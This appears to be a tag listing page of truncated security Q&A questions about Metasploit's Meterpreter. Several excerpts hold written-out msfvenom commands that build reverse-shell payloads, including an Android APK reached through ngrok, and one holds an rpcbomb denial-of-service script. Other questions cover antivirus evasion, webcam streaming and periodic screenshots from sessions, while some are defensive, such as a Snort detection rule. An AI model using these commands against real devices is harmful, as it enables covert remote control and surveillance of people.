Questions tagged [meterpreter]
The meterpreter tag has no summary.
134 questions
1vote
0answers
579views
The "Shell" command does not work in Meterpreter [closed]
I would like to share the solution I have used in this issue Scenario: meterpreter > ? Stdapi: System Commands ======================= Command Description ------- ...
1vote
1answer
94views
How can I prevent msfvenom Python payloads from forking without manually decoding the payload?
I am generating a Python payload using msfvenom with the following command: msfvenom -p python/meterpreter_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=192.168.173.137 LPORT=...
0votes
0answers
145views
Getting the error stdapi_webcam_start: Operation failed: 731 when trying to stream from my Logitech C920 webcam in Meterpreter
I'm trying to use the webcam_stream command in Meterpreter, and I receive the following error: meterpreter > webcam_stream [*] Starting... [*] Preparing player... [*] Opening player at: /home/kali/...
0votes
1answer
148views
Using Metasploit on Kali to attack a Linux machine [closed]
Whats wrong with my exploit? I'm trying to attack a Linux machine using Kali. I cannot seem to get the meterpreter session started.
0votes
1answer
254views
Snort rule doesn't match the content in Meterpreter session packet
I'm working on a university project and I'm trying to identify a reverse shell attack with Snort IDS. For the attack I used Meterpreter/reverse_tcp and analyzed the packets via Wireshark for traces to ...
0votes
1answer
2kviews
APK reverse shell using ngrok is not creating a session
I am using ngrok for port forwarding (./ngrok tcp 4242) I created a payload using msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.in.ngrok.io LPORT=16656 R> /var/www/html/package.apk then ...
2votes
0answers
310views
Metasploit Meterpreter how to restore/create new session? [closed]
I created an apk for Android with Metasploit. Started with host ip and port and opened the "receiver terminal" A lot of things worked well when executing the apk but after some time the ...
0votes
0answers
191views
How does meterpreter stay covert and undetected?
I've heard that meterpreter is really good at being stealthy and staying undetected. However, I can't seem to find articles detailing how it stays stealthy. I do know about encoders like "Shikata ...
0votes
1answer
408views
session are not showing in meterpreter [duplicate]
I have a problem that when I try to open multi handler in msfconsole to exploit android, the sessions are not showing. But when I connect both PC and android to the same wifi, then the sessions are ...
0votes
1answer
418views
Meterpreter: How to invoke commands in a loop for each new connection
I want to execute commands like screenshot on a regular interval (e.g. each 5min) for each incoming connection to Meterpreter using the reverse_tcp payload until the connection gets closed by the ...
2votes
0answers
1kviews
Metasploit opens Meterpreter, but the shell is unresponsive [closed]
I created a payload using msfvenom android/meterpreter/reverse_tcp LHOST=192.168.2.2 R > ANDROID.apk signed the apk, sent it to my phone, opened up msfconsole and ran set payload android/...
0votes
2answers
2kviews
Meterpreter session vs shell
What is the meaning of "meterpreter session"? My understanding is it is a session that we can send commands to the host for execution. And a meterpreter session is created when we don't get ...
0votes
0answers
31views
Will VPN help to restrict Meterpreter session? [duplicate]
I'm a victim of Meterpreter attack. I'm now using VPN in all the devices. My question is, will it help me to restrict meterpreter attack? If not, what is the way out to get rid of meterpreter attack?
0votes
2answers
1kviews
How to run a meterpreter script multiple times
I have this very simple script to run a rpcbomb script from auxiliary/dos/rpc/rpcbomb for a DOS attack. use auxiliary/dos/rpc/rpcbomb set RHOSTS Victim_IP_Address set RPORT 111 exploit -j -z I want ...
0votes
2answers
3kviews
Making My Own Custom Payload [closed]
I have tried many different tools to avoid being detected by an AV while using meterpreter exploit. Here is a list of tools I have tried: Shellter, Posh C2, Hack the World, Veil, Fat Rat, and many ...